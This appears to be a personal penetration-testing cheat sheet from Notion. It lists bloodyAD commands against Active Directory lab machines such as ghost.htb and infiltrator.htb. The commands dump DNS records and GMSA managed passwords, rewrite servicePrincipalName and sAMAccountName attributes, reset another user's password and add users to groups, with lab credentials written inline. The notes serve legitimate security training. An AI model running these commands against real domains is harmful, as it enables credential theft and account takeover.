bloodyAD | Notion

DNS records dump

bloodyAD --host dc01.ghost.htb  -d ghost.htb -k  get dnsDump

GMSA dump

bloodyAD --host dc01.ghost.htb  -d ghost.htb  -u justin.bradley  -p 'Qwertyuiop1234$$'  get object 'ADFS_GMSA$' --attr msDS-ManagedPassword

Get object data ‘user, group…’

bloodyAD -d inlanefreight.local -u aneudy -p Ilovemusic01 --host 10.129.229.224 get object felipe | grep "servicePrincipalName\|sAMAccountName"

Set object data

bloodyAD -d inlanefreight.local -u aneudy -p Ilovemusic01 --host 10.129.229.224 set object felipe servicePrincipalName

modify sAMAccountName

bloodyAD -d inlanefreight.local -u aneudy -p Ilovemusic01 --host 10.129.229.224 set object felipe sAMAccountName -v DC03

change user password

bloodyAD -d "infiltrator.htb" --host "dc01.infiltrator.htb" --dc-ip 10.10.11.31  -u "d.anderson" -p 'WAT?watismypass!' -k set password "e.rodriguez" 'P@$$w0rd'

add to a group

bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p 'WAT?watismypass!' add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" 'e.rodriguez'